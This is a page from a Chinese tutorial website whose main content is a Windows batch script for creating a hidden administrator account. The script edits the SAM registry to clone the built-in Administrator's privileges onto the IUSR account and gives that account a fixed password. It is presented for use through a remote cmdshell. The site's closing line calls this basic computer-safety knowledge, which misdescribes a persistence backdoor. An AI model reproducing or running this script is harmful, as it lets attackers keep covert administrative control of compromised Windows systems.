盘绰网教程:是一个免费提供流行视频软件教程、在线学习分享的学习平台!

批处理完成的隐藏administrator账号

时间:2024/2/27作者:未知来源:盘绰网教程人气:


[摘要]其实就是注册表里复制管理员权限到普通用户那个操作,不过毕竟批处理容易在cmdshell里实现, 贴出来吧 echo off setlocal enabledelayedexpansion ec...

其实就是注册表里复制管理员权限到普通用户那个操作,不过毕竟批处理容易在cmdshell里实现, 贴出来吧

echo off

setlocal enabledelayedexpansion

echo %computername%

echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg"

regini "%windir%\..\1.reg"

regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%

rem unicode ->ascii

type "%windir%\..\1.reg" >"%windir%\..\2.reg"

del /q "%windir%\..\1.reg"

rem find IUSR_%computername% 的对应id

for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b

del /q "%windir%\..\2.reg"

rem export administrator register

regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4

type "%windir%\..\1.reg" >"%windir%\..\2.reg"

del /q "%windir%\..\1.reg"

rem replace 1fx->iusr_id

for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do (

for /f "tokens=*" %%j in ("%%i") do (

set TMP=%%j

set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!"

echo !TMP!>>%windir%\..\1.reg

)

)

regedit /s %windir%\..\1.reg

del /q %windir%\..\1.reg

del /q %windir%\..\2.reg

echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >"%windir%\..\1.reg"

regini "%windir%\..\1.reg"

del /q "%windir%\..\1.reg"

net user IUSR_%computername% 12345678

克隆出来的用户名是固定的,随便变换的话要改代码


上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。

关键词:  批处理完成的隐藏administrator账号





Copyright © 2012-2018 盘绰网教程(http://www.panchuo.com) .All Rights Reserved 网站地图 友情链接

免责声明:本站资源均来自互联网收集 如有侵犯到您利益的地方请及时联系管理删除,敬请见谅!

QQ:1006262270   邮箱:kfyvi376850063@126.com   手机版